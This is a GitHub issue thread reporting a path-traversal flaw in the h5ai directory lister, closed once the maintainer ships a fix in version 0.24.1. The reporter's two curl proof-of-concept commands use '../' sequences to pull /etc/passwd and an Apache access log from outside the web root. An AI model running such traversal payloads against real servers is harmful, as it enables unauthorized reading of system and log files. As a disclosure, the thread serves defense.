Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security issue: arbitrary file download #269

Closed
BestPig opened this issue Apr 8, 2014 · 4 comments
Closed

Security issue: arbitrary file download #269

BestPig opened this issue Apr 8, 2014 · 4 comments
Labels
Bug

Comments

@BestPig
Copy link

BestPig commented Apr 8, 2014

An attacker is able to download a file out of the h5ai root directory.

curl --data "action=download&as=test.tar&type=php-tar&hrefs=/../../../../etc/passwd&items=true" http://somesite.com/h5ai/
@lrsjng
Copy link
Owner

lrsjng commented Apr 9, 2014

Can't reproduce that issue, @BestPig can you send in a working example?

@BestPig
Copy link
Author

BestPig commented Apr 9, 2014

It's not working with /etc/passwd on your server because the web server has not the right to read the file. But it's working for example with the apache log file.

curl --data "action=download&as=test.tar&type=php-tar&hrefs=/../logs/access_log" http://larsjung.de/h5ai/sample/

@lrsjng lrsjng added the Bug label Apr 9, 2014
@lrsjng
Copy link
Owner

lrsjng commented Apr 9, 2014

@BestPig: there should be an automated dev build for the latest commit e6f09d5 in http://release.larsjung.de/h5ai/dev/ soon. Could you please check this build.

@lrsjng
Copy link
Owner

lrsjng commented Apr 9, 2014

fixed in 0.24.1

@lrsjng lrsjng closed this as completed Apr 9, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@lrsjng @BestPig